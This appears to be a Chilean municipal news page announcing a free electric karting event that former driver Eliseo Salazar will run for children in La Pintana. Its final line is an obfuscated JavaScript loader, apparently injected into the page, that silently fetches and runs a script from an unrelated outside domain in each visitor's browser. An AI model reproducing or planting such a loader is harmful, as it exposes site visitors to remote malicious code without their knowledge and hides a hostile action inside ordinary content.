Eliseo Salazar llega a La Pintana con jornada gratuita de E-Karting

CCR abre atenciones de salud en Cedeco Sur
28 Junio, 2022
Liceo 523 Parque Las Américas logra clasificar a la fase regional de básquetbol
29 Junio, 2022

La electromovilidad avanza a pasos agigantados en el mundo entero. Bien lo sabe el ex competidor internacional de automovilismo Eliseo Salazar, quien llegó hasta el liceo 523 parque las américas, para anunciar que su innovador karting llegará hasta La Pintana para fomentar, en las nuevas generaciones, el uso de las energías limpias.

Una actividad que se vincula con las metas de estado y la innovación en el uso de los recursos naturales para la tecnología. Con esta actividad se busca fomentar en los más pequeños el uso de energías limpias.

Una iniciativa que se enmarca en las vacaciones de invierno para los estudiantes del país y que ofrecerá 300 cupos limitados para niños y niñas de entre 6 y 12 años. Este karting que llega por primera y única vez a La Pintana, gracias a una gestión conjunta entre la ilustre municipalidad, Eliseo Salazar y el patrocinio de Isa Intervial.

En esta instancia, además de anunciar oficialmente la actividad, se hizo una breve exposición sobre la industria automovilística y los avances tecnológicos que esta deberá enfrentar para sumarse al objetivo que el estado de chile se ha puesto para los próximos 13 años: alcanzar la carboneutralidad.

La actividad se realizará el próximo sábado 9 de julio, desde las 10.00 de la mañana, en la plaza cívica y los cupos para participar, serán limitados.

;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P'); //]]>